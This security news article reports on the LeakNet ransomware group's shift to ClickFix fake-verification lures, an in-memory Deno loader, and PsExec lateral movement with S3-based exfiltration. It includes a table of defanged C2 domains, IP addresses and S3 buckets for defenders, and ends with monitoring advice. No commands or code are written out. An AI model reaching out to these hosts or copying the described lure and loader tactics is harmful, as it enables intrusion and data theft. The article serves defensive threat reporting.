The ransomware group known as LeakNet is evolving its tactics, significantly enhancing its attack methods to ensnare a broader range of victims. Previously, the group operated with a modest average of three targets per month, primarily relying on purchasing stolen network access from other cybercriminals. However, LeakNet is now pivoting towards launching its own campaigns, employing innovative strategies that include deceptive error screens and a sophisticated new tool capable of executing malicious code directly in a computer’s memory.
Despite these advancements in entry techniques, LeakNet maintains a consistent approach once it infiltrates a network, providing defenders with a valuable opportunity to thwart their efforts before any files are encrypted.
LeakNet Adopts ClickFix and Deno Loader
One of the most notable shifts in LeakNet’s strategy is the introduction of ClickFix lures. This method involves compromising legitimate websites to display a fraudulent security check, such as a counterfeit Cloudflare Turnstile page. Users are tricked into copying and pasting a malicious command into their computer’s run dialog, effectively allowing LeakNet to cast a wide net across unsuspecting web users. This tactic not only broadens their reach but also reduces their cost per victim, as they no longer need to wait for valuable accounts to surface on dark web markets.
This “bring your own runtime” technique leaves minimal traces on the hard drive, complicating detection by conventional antivirus software. The Deno loader, a key component of this strategy, collects information about the infected machine, communicates with the attacker’s server, and continuously retrieves additional malicious code without saving any standard files. Due to Deno being a trusted tool, its activities often go unnoticed by standard security blocklists.
A Predictable Post-Exploitation Playbook
| IOC Type | Details |
|---|---|
| ClickFix Domain | tools.usersway[.]net, apiclofront[.]com, sendtokenscf[.]com, binclloudapp[.]com |
| Deno C2 Domain | okobojirent[.]com, mshealthmetrics[.]com, verify-safeguard[.]top, cnoocim[.]com, delhedghogeggs[.]com, serialmenot[.]com, crahdhduf[.]com |
| Deno C2 IP Address | 194.31.223[.]42, 144.31.2[.]161, 87.121.79[.]6, 87.121.79[.]25, 144.31.54[.]243, 144.31.224[.]98 |
| Sideloaded jli.dll C2 Domain | neremedysoft[.]com, ndibstersoft[.]com, windowallclean[.]com |
| Malicious S3 Bucket | fastdlvrss.s3.us-east-1.amazonaws[.]com, backupdailyawss.s3.us-east-1.amazonaws[.]com |
Following their initial infiltration, the attackers proceed to check the system for active user credentials using built-in Windows commands. Armed with this information, they navigate laterally through the network utilizing PsExec, a standard administrative tool. Ultimately, LeakNet employs conventional Amazon S3 buckets to stage their payloads and exfiltrate sensitive data. By leveraging standard administrative tools and cloud services, their actions seamlessly blend into everyday network traffic.
To safeguard against these emerging threats, defenders are encouraged to prioritize monitoring for suspicious behavior rather than merely searching for known malicious files. Security teams should remain vigilant for unusual commands initiated by web browsers, unexpected connections to cloud storage from standard endpoints, and the operation of tools like Deno outside typical developer environments. By isolating machines as soon as recognizable patterns emerge, organizations can effectively disrupt attacks before ransomware is deployed.
Follow us on Google News , LinkedIn and X to Get More Instant Updates. Set Cyberpress as a Preferred Source in Google
